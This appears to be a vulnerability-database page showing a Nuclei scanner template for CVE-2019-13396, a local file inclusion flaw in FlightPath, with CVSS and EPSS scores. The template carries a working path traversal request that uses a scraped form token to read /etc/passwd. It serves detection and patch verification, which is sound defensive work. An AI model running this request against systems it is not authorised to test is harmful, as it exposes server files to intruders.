Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-13396
HistoryJan 10, 2022 - 11:58 p.m.

FlightPath - Local File Inclusion

2022-01-1023:58:14
ProjectDiscovery
github.com
1

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

0.048 Low

EPSS

Percentile

92.8%

FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.

id: CVE-2019-13396

info:
  name: FlightPath - Local File Inclusion
  author: 0x_Akoko,daffainfo
  severity: medium
  description: FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.
  impact: |
    This vulnerability can lead to unauthorized access, data leakage, and remote code execution.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/47121
    - http://getflightpath.com/node/2650
    - https://nvd.nist.gov/vuln/detail/CVE-2019-13396
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-13396
    cwe-id: CWE-22
    epss-score: 0.0288
    epss-percentile: 0.9075
    cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: getflightpath
    product: flightpath
  tags: cve,cve2019,flightpath,lfi,edb,getflightpath

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - "idden' name='form_token' value='([a-z0-9]+)'>"
        internal: true
        part: body
# digest: 490a004630440220474698615742c3b9befbda0e2bcb85bea35969f6c9f19e2bb2fd6a5cd02d2543022024e1f6e2bfaa043096ff492722e9f66622063a2d97e7fdff5b61c95c200bcd9f:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

0.048 Low

EPSS

Percentile

92.8%